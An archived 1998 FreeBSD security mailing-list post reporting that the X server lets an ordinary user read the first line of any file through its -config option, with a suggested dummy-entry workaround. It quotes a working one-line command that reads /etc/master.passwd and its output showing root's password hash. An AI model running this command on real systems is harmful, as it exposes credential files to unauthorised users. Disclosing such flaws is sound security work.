Date: Fri, 16 Oct 1998 18:08:02 +1300 (NZDT) From: Andrew McNaughton <andrew@squiz.co.nz> To: security@FreeBSD.ORG Subject: X allows ordinary user to read first line of any file Message-ID: <Pine.BSF.4.01.9810161756550.706-100000@aniwa.sky>
next in thread | raw e-mail | index | archive | help
found this on http://www.hoobie.net/security/exploits/ joeuser@host$ X -config /etc/master.passwd Unrecognized option: root:yd0Rj.v.r1wKA:0:0::0:0:Charlie use: X [:<display>] [option] . . . I'm sure there's other files where this can be a problem, but in the case of the password file it seems wise to have a dummy entry as the first line of the master.passwd file. Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.01.9810161756550.706-100000>